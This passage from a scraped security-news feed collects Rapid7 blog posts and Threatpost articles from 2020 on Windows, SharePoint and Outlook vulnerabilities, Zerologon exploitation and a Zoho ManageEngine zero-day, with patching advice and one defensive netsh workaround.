Interface (GDI) handles objects in memory. A successful exploitation allows the attacker to install programs and/or create new accounts under the same user rights as the user who triggered this vulnerability.\n\nA mitigating factor here is that users with fewer privileges on the system could be less impacted, but still emphasizes the importance of good security hygiene as exploitation requires convincing a user to open a specially-crafted file or to view attacker-controlled content.\n\nUnlike CVE-2020-16898, however, this vulnerability affects all supported versions of Windows OS, which may suggest affecting unsupported/earlier versions of Windows as well.\n\n### \n\n## Moving on to Microsoft SharePoint\n\nContinuing last month's trend, there are more SharePoint-related vulnerabilities being addressed this month (10 of them) than past months. If relevant in your environment, the respective KBs for your version of SharePoint should be the next batch of patches to prioritize. Below are some highlights of the higher CVSS-scored ones.\n\n### Microsoft SharePoint Remote Code Execution Vulnerabilities ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>), [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>))\n\nWith Proof-of-Concept exploits starting to flow out in the wild, bringing a closure to this pair of critical remote code execution vulnerabilities is a must.\n\nCVE-2020-16951 and CVE-2020-16952 are remote code execution vulnerabilities that exploit a gap in checking the source markup of an application package. Upon successful exploitation, the attacker could run arbitrary code in the context of the SharePoint application pool or server farm account.\n\nFor more in-depth attacker perspective, visit [AttackerKB's take on CVE-2020-16952.](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>)\n\n### Microsoft SharePoint Reflective XSS Vulnerabilities ([CVE-2020-16944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16944>), [CVE-2020-16945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16945>), [CVE-2020-16946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16946>))\n\nThe last set of notable SharePoint vulnerabilities this month are three CVSS 8.7 spoofing vulnerabilities. Requiring a user to click a specially-crafted URL within targeted SharePoint Web App site, a successful exploitation from those means allows the attacker to perform cross-site scripting attacks and/or run scripts in the security context of the user.\n\n## Closing October's Update Tuesday journey with Microsoft Office\n\nWhile we always expect Office-based vulnerabilities every month, two vulnerabilities particularly stood out. In both cases, the Preview Pane is considered an attack vector, which lowers the barriers to entry a bit.\n\n### [Microsoft CVE-2020-16947: Outlook Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)\n\nA critical remote code execution vulnerability for Outlook 2016, Office 2019 and Microsoft 365 apps only, CVE-2020-16947 has the potential to allow an attacker to run arbitrary code in the context of the user. The attacker could then install programs or create new accounts with full user rights.\n\nWhile the details behind this vulnerability feels standard from Microsoft's description, it actively acknowledges that the Preview Pane is an attack vector, and that in itself, attracts some attention.\n\n### [Microsoft CVE-2020-16949: Outlook Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16949>)\n\nCVE-2020-16949 is an Outlook vulnerability that affects more versions than the list around CVE-2020-14947 including Outlook 2010 and Outlook 2013. This vulnerability, however, reads differently in that this denial of service vulnerability only requires that a specially-crafted email be sent. When paired with the fact that this vulnerability is marked with the Preview Pane as an attack vector, just like CVE-2020-16947, suggests giving Outlook its fair share of attention this month.\n\n\n\n________Note: Graph data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "cvss3": {}, "published": "2020-10-13T23:25:39", "type": "rapid7blog", "title": "Patch Tuesday - October 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14947", "CVE-2020-16896", "CVE-2020-16898", "CVE-2020-16911", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16947", "CVE-2020-16949", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-9746"], "modified": "2020-10-13T23:25:39", "id": "RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "href": "https://blog.rapid7.com/2020/10/13/patch-tuesday-october-2020/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-28T04:47:53", "description": "\n\nIf you\u2019re in the U.S. and were waiting for an \u201cOctober surprise\u201d, look no further than [CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) which is a remote code execution (RCE) vulnerability in the Windows TCP/IP stack, or what our own [Tod Beardsley](<https://twitter.com/todb>) likes to call \u201cexploiting poor implementations of [core IETF RFC](<https://ietf.org/standards/rfcs/>)s\u201d.\n\nThe vulnerability arises when the TCP/IP stack does not properly handle ICMPv6 Router Advertisement packets. Successful exploitation requires sending specially-crafted ICMPv6 Router Advertisement packets to a remote Windows computer and could give an attacker the ability to execute code on the target server or client. CVE-2020-16898 carries a CVSSv3 base score of 9.8.\n\nOur talented crew of Rapid7 vulnerability researchers have a [technichal analysis up on AttackerKB](<https://attackerkb.com/topics/17lFRTT1DO/cve-2020-16898-aka-bad-neighbor>), and security firm McAfee has their own technical analysis of CVE-2020-16898 [available here](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>), which we recommend reading. Their research and engineering teams note that the Microsoft-provided exploit is \u201cboth extremely simple and perfectly reliable[, and] results in an immediate [Blue Screen of Death] (BSoD)\u201d.\n\nBefore we go any further, we would like to strongly encourage you to patch this vulnerability if you are running Windows 10, Windows Server 2019, or Windows Server Core 1903, 1909, or 2004. You really don\u2019t want to mess around when the word \u201cwormable\u201d is being used and so many eyes are on the non-BSOD prize of a fully-working RCE. If you cannot patch, consider disabling ICMPv6 Recursive DNS Server (RDNSS) as a workaround (which is, unfortunately, only available for Windows 1709 and above) via the PowerShell command:\n \n \n netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable\n \n\n## More Like \u201cSlightly Annoying Neighbors\u201d (For Now)\n\nAs noted above, there are many folks who have access to the known BSoD exploit and scads more burning through cases of Mountain Dew to try to replicate the BSoD on their own (which is a common first step when attempting to get a repeatable remote code execution exploit to work). Weaponizing this and other BSoD=&gt;RCE bugs is [not exactly trivial](<ttps://attackerkb.com/topics/71QrpupdZO/dejablue-rdp-heap-overflow?referrer=16898>), especially on modern operating systems like the ones impacted by this weakness.\n\nIn the short term (and, possibly long term) you should be more wary of disruption and distraction campaigns using this weakness, especially since IPv6 is very likely running on your internal network (where Bad Neighbor attacks are really most likely to occur) without you being aware of it.\n\n## What More Can You Do?\n\n[InsightVM](<https://www.rapid7.com/products/insightvm/>) and Nexpose can assess their exposure to CVE-2020-16898 with an authenticated check.\n\nSee [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) for further details and keep an eye on [the AttackerKB Bad Neighbor topic](<https://attackerkb.com/topics/17lFRTT1DO/cve-2020-16898-aka-bad-neighbor>).\n\nDefenders may also find the detection logic and a [available Suricata rule](<https://github.com/advanced-threat-research/CVE-2020-16898>) (courtesy of McAfee\u2019s threat detection team) quite useful.\n\nDon\u2019t be equally surprised in November, December, January, or any of the other calendar months. You and your organization should really be prepared to have between 1-5 critical \u201cpatch now\u201d events each month for the foreseeable future. That may seem disruptive, but the spate of critical bugs in core business and remote access technologies has become the new normal and the only way to handle it is to make it part of the plan.\n\n## Updates\n\nOn 2020-10-14 Juniper Networks [released an advisory](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11049&cat=SIRT_1&actp=LIST>) noting that the following JunOS versions are vulnerable to CVE-2020-16898 if the DHCPv6 Relay Agent feature is configured/enabled via `[forwarding-options dhcp-relay dhcpv6]`:\n\n * 12.3 versions prior to 12.3R12-S15;\n * 12.3X48 versions prior to 12.3X48-D95;\n * 14.1X53 versions prior to 14.1X53-D53;\n * 15.1 versions prior to 15.1R7-S6;\n * 15.1X49 versions prior to 15.1X49-D200;\n * 15.1X53 versions prior to 15.1X53-D593;\n * 16.1 versions prior to 16.1R7-S7;\n * 16.2 versions prior to 16.2R2-S11;\n * 17.1 versions prior to 17.1R2-S11, 17.1R3-S2;\n * 17.2 versions prior to 17.2R3-S3;\n * 17.2X75 versions prior to 17.2X75-D44;\n * 17.3 versions prior to 17.3R3-S7;\n * 17.4 versions prior to 17.4R2-S9, 17.4R3;\n * 18.1 versions prior to 18.1R3-S9;\n * 18.2 versions prior to 18.2R2-S6, 18.2R3-S2;\n * 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60;\n * 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1;\n * 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3;\n * 19.1 versions prior to 19.1R1-S4, 19.1R2;\n * 19.2 versions prior to 19.2R1-S3, 19.2R2;\n * 19.3 versions prior to 19.3R2.\n\nThere are no workaround for this issue.\n\nJuniper has assigned a separate CVE \u2014 CVE-2020-1656 \u2014 for this vulnerability.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-10-14T02:38:11", "type": "rapid7blog", "title": "There Goes The Neighborhood: Dealing With CVE-2020-16898 (and CVE-2020-1656) (aka\"Bad Neighbor\")", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1656", "CVE-2020-16898"], "modified": "2020-10-14T02:38:11", "id": "RAPID7BLOG:0E497787F9B42FC1D11439220E6A9D3F", "href": "https://blog.rapid7.com/2020/10/14/there-goes-the-neighborhood-dealing-with-cve-2020-16898-a-k-a-bad-neighbor/", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-19T14:41:15", "description": "\n\n[Windows Server 2008 and 2008 R2](<https://www.microsoft.com/en-us/cloud-platform/windows-server-2008>) reached their end of life (EOL) on Jan. 14, 2020. What does that mean in practice? Well, any instances running these versions of Windows Server are no longer supported by Microsoft\u2014no more automated fixes, updates, or technical assistance. \n\nFrom a security standpoint, any exploits that appear after Jan. 14 that affect these specific versions of Windows will not likely be addressed for the vast majority of installations. Though there have been [exceptions to end of support](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/revised-end-of-service-date-for-windows-10-version-1803-may-11/ba-p/1614136>) under unusual circumstances, such as the extension of support for Windows 10 in light of the unprecedented COVID-19 pandemic, such exceptions shouldn\u2019t be expected to be the norm.\n\nThrough a sampling of some of our data, we realized that even as of the date of this post, there were many instances of Windows Server 2008 still running in the wild\u2014and by extension, associated variations of dependent software, such as Microsoft Internet Information Services (IIS) version 7.0 and 7.5. \nWe took a more systematic look at the prevalence of the different versions of Windows Server that are floating out on the open internet. We performed a number of internet-wide scans using [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), and fingerprinted the returned data using [Recog](<https://blog.rapid7.com/2020/04/08/self-isolation-home-networking-and-open-source-recog-and-rumble/>), when possible, to enable us to identify specific versions of Windows Server.\n\n\n\nWhat we found was alarming: Over the course of September 2020, 59% of all uniquely observed instances of Windows Server were unsupported, while 41% were supported. However, the uneven balance of dangerous versus safe services that we observed is not terribly unusual. It seems to be more the norm that the preponderance of actively running services on the internet are outdated, unsupported, improperly patched, or insecure. For examples, see any number of Rapid7\u2019s past blog posts, including reflections on the state of [PHP](<https://blog.rapid7.com/2018/12/17/charting-the-forthcoming-phpocalypse-in-2019/>) and [Microsoft Exchange](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>).\n\nWe were also able to identify the countries in which these unsupported Windows Server instances were located, and determined (without much surprise) that the heaviest concentrations were in the United States and China.\n\n\n\nOn the other hand, the heaviest concentrations of _supported_ versions of Windows Server were _also _the United States and China, though if we examine the coloration scale more closely, we do see that the numbers for unsupported versions are significantly larger than supported.\n\n\n\nFor a more direct comparison of supported versions of Windows Server against unsupported versions within countries, we calculated the difference between the two classes within each country. This allowed us to get past a consideration of the raw prevalence of Windows Server within particular countries. In this case, we found that Poland manifested itself particularly well, with the most dramatic difference in terms of absolute counts of supported over unsupported versions, while the United States appeared the worst off, with nearly half a million more instances of unsupported versions than supported.\n\n\n\nThere is also observable variation between hosting service providers within countries in terms of unsupported Windows Server instances. For instance, we can note that Hangzhou Alibaba Advertising hosts by a wide margin the most instances of unsupported Windows Server instances within China.\n\n\n\nWhile we can assert that the state of Windows Server security across the internet in this latest month doesn\u2019t look great, there does appear to be some level of progress. Over the past several months, we have observed a notable decline in the number of unsupported variants of Windows Server - including Windows Server 2003, 2008, and their various release candidates.\n\n\n\nThe decline in usage of Server 2008 and Server 2008 R2 amounted to approximately 40,000 and over 2,000,000 instances, respectively. The net decline that we observed in Windows Server instances does comport with what other internet researchers have observed as well. For instance, Netcraft noted a [shift from Windows web servers to OpenResty](<https://news.netcraft.com/archives/category/web-server-survey/>). There was an unusual spike in counts (though not terribly significant in terms of absolute numbers) for Server 2003 R2 that we noticed and are still looking into, though at this time, our best guess is this is simply a manifestation of the somewhat stochastic spirit of Sonar.\n\n\n\nHow severe is all this? Well, it really depends on the types of vulnerabilities and exploits that crop up and how Microsoft decides to respond. \n\nFor instance, in early September, the [Zerologon (CVE-2020-1472) vulnerability](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>) was publicly disclosed, with a whopping CVSSv3 rating of 10.0 (i.e., as bad as it gets). This allowed for the elevation of privileges up to a domain admin level by exploiting a cryptographic weakness in the [Netlogon Remote Protocol](<https://www.secura.com/blog/zero-logon>). The vulnerability affected a number of versions of Windows Server. Microsoft addressed the Netlogon vulnerability with a round of patches in August, which fortuitously included a patch for Windows Server 2008 R2 SP 1 (based on the information released and some testing by Rapid7 Principal Security Researcher Tom Sellers, it seems that Windows Server 2008 is not susceptible to [Zerologon](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)). \n\nWithout the good graces of Microsoft, the Zerologon vulnerability could have become a perpetual vulnerability for millions of Windows Server 2008 R2 instances that remain open on the public internet. Imagine the prospecting opportunities for malicious actors yearning for domain admin access to critical enterprise production systems. Quite frankly, given the recency of the patch and the tendency for patches to be slow in application, it wouldn\u2019t be surprising at all if there are many extant Windows Server 2008 instances that remain unpatched and severely exploitable, presenting ripe opportunities for mayhem.\n\nHere are some key actions that can be performed to minimize the risk posed by the usage unsupported Windows Server versions:\n\n * Stop using unsupported Windows Server versions. Migrate to a more recent and active version of Windows Server (or, if you are to follow Microsoft\u2019s advice, simply migrate to the cloud and embrace [Microsoft Azure](<https://www.microsoft.com/en-us/cloud-platform/windows-server-2008>)).\n * Remove public access to unsupported versions of Windows Server.\n * If there remains a need to continue using unsupported versions, at the very least, apply past available patches. This doesn\u2019t fully address the concerns manifesting from using unsupported versions, such as newly discovered zero-day exploits, but it does at least mitigate some past lingering risks.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-10-19T13:06:38", "type": "rapid7blog", "title": "Are You Still Running End-of-Life Windows Servers?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-19T13:06:38", "id": "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "href": "https://blog.rapid7.com/2020/10/19/are-you-still-running-end-of-life-windows-servers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-10-14T22:23:27", "description": "UPDATE\n\nThe \u201cperfect\u201d Windows vulnerability known as the Zerologon bug is getting a patch assist from two non-Microsoft sources, as they strive to fill in the gaps that the official fix doesn\u2019t address.\n\nThey roll out as Microsoft announced that it is tracking active exploitation in the wild. \u201cWe have observed attacks where public exploits have been incorporated into attacker playbooks,\u201d the firm [tweeted on Wednesday](<https://twitter.com/MsftSecIntel/status/1308941504707063808>).\n\nBoth Samba and 0patch have issued fixes for CVE-2020-1472, an privilege-escalation bug which, [as previously reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user- and machine-authentication.\n\nExploiting the bug allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, according to Microsoft. A proof-of-concept exploit [was just released](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the issue, which is a critical flaw rating 10 out of 10 on the CvSS severity scale.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis attack has a huge impact: It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain,\u201d said researchers with Secura, [in a whitepaper](<https://www.secura.com/pathtoimg.php?id=2055>) published earlier this month.\n\nMicrosoft did issue a [patch for the flaw in August](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>), during its regularly scheduled Patch Tuesday updates. However, not all systems are compatible with the fix, according to Mitja Kolsec, CEO and co-founder at 0patch, which issued a \u201cmicropatch\u201d of its own for the bug.\n\n\u201cOur micropatch was made for Windows Server 2008 R2, which reached end-of-support this January and stopped receiving Windows updates,\u201d Kolsec told Threatpost. \u201cMany organizations are still using this server and the only way for it to get extended security updates from Microsoft was to move it to Azure (cloud) \u2014 which is an unacceptable option for most organizations.\u201d\n\nThe micropatch is logically identical to Microsoft\u2019s fix, he explained in a recent [blog post](<https://blog.0patch.com/2020/09/micropatch-for-zerologon-perfect.html>): \u201cWe injected it in function NetrServerAuthenticate3 in roughly the same place where Microsoft added the call to NlIsChallengeCredentialPairVulnerable, but since the latter doesn\u2019t exist in old versions of netlogon.dll, we had to implement its logic in our patch.\u201d\n\n0patch is also porting the micropatch to various still-supported Windows Servers for customers who for various reasons can\u2019t apply the Microsoft patch, he added.\n\nMeanwhile, it turns out that Samba, a file-sharing utility for swapping materials between Linux and Windows systems, also relies on the Netlogon protocol, and thus suffers from the vulnerability.\n\nThe bug exists when Samba is used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC), it said in [an advisory](<https://www.samba.org/samba/security/CVE-2020-1472.html>) this week. It added, \u201cinstallations running Samba as a file server only are not directly affected by this flaw, though they may need configuration changes to continue to talk to domain controllers.\u201d\n\nThe company noted that versions 4.8 and above of Samba are not vulnerable unless they have the smb.conf lines \u2018server schannel = no\u2019 or \u2018server schannel = auto\u2019. Samba versions 4.7 and below are vulnerable unless they have \u2018server schannel = yes\u2019 in the smb.conf.\n\nLast Friday, the U.S. Cybersecurity and Infrastructure Security Agency [issued an emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) for federal agencies to patch against the bug. Federal agencies that haven\u2019t patched their Windows Servers against the Zerologon vulnerability by Monday Sept. 21 at 11:59 pm EDT are in violation. And in light of the active, in-the-wild exploitation flagged by Microsoft, patching should be at the top of the to-do list for all organizations.\n\n> Microsoft is actively tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon EoP vulnerability, dubbed Zerologon. We have observed attacks where public exploits have been incorporated into attacker playbooks.\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [September 24, 2020](<https://twitter.com/MsftSecIntel/status/1308941504707063808?ref_src=twsrc%5Etfw>)\n\n_**This story was updated at 11 a.m. ET on Sept. 23 to include information on active exploitation.**_\n", "cvss3": {}, "published": "2020-09-23T21:05:54", "type": "threatpost", "title": "Zerologon Patches Roll Out Beyond Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-09-23T21:05:54", "id": "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "href": "https://threatpost.com/zerologon-patches-beyond-microsoft/159513/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:08:35", "description": "Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.\n\nThe [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East to exfiltrate data. Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cMSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (Zerologon) in active campaigns over the last 2 weeks,\u201d according to a [Microsoft tweet on Monday evening](<https://twitter.com/MsftSecIntel/status/1313246337153077250>).\n\nMicrosoft released a patch for the Zerologon vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). The bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). [As previous reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n[Then, earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security to issue a rare emergency directive, ordering federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nMicrosoft\u2019s alert also comes [a week after Cisco Talos researchers warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n> MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks. We strongly recommend patching. Microsoft 365 Defender customers can also refer to these detections: <https://t.co/ieBj2dox78>\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [October 5, 2020](<https://twitter.com/MsftSecIntel/status/1313246337153077250?ref_src=twsrc%5Etfw>)\n\nMicrosoft did not reveal further details of the MERCURY active exploitations in terms of victimology; however, a graph on its website shows that exploitation attempts (by attackers and red teams in general) started as early as Sept. 13 and have been ongoing ever since.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/06110502/1.png>)\n\nZerologon flaw attacker and red team activity. Credit: Microsoft\n\n\u201cOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution,\u201d said Microsoft [in an earlier analysis](<https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>). \u201cFollowing the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers found with the Zerologon exploit.\u201d\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-06T15:51:12", "type": "threatpost", "title": "Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-10-06T15:51:12", "id": "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "href": "https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that 